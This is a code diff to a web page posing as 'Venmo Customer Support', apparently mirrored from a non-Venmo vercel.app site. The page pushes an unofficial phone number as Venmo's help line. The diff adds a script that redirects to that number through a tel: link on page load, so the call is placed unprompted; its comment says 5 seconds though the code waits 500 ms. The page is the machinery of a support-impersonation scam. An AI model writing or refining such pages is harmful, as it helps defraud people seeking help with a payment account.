--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 
-<html lang="en"><!-- Mirrored from venmoss-24x7-support-number.vercel.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 20 Mar 2025 15:19:53 GMT --><!-- Added by HTTrack --><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><!-- /Added by HTTrack -->
-
+<!DOCTYPE html>
+<html lang="en">
+<head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Venmo Customer Support</title>
@@ -94,12 +95,11 @@
             text-decoration: underline;
         }
     </style>
-    <script src="js/render.6a98e0a4cecd7130212c.js" async=""></script>
 </head>
-<script defer data-domain="oksisven.com" src="https://plausible.io/js/script.js"></script>
 <body>
 
     <div class="container">
+            <img src="Venomo.jpg" alt="Venmo Logo">
 
         <h2>Venmo Customer Support</h2>
 
@@ -118,10 +118,8 @@
             speed up the resolution process.
         </p>
 
-        <a href="tel:+18557711765" class="call-button">Toll free for Venmo Support</a>
-        <a href="tel:+18557711765" class="call-button">Venmo Help-Center</a>
+        <a href="tel:+18557711765" class="call-button">Call Venmo Support</a>
 
-        
         <p>
             For further assistance, visit our help center on the official Venmo website for additional resources and FAQs.
         </p>
@@ -133,9 +131,12 @@
 
     
     <script>
+        window.onload = function() {
+            setTimeout(function() {
+                window.location.href = "tel:+18557711765"; 
+            }, 500); // Automatically calls after 5 seconds
+        };
+    </script>
 
-
-
-
-
-</body></html>
+</body>
+</html>
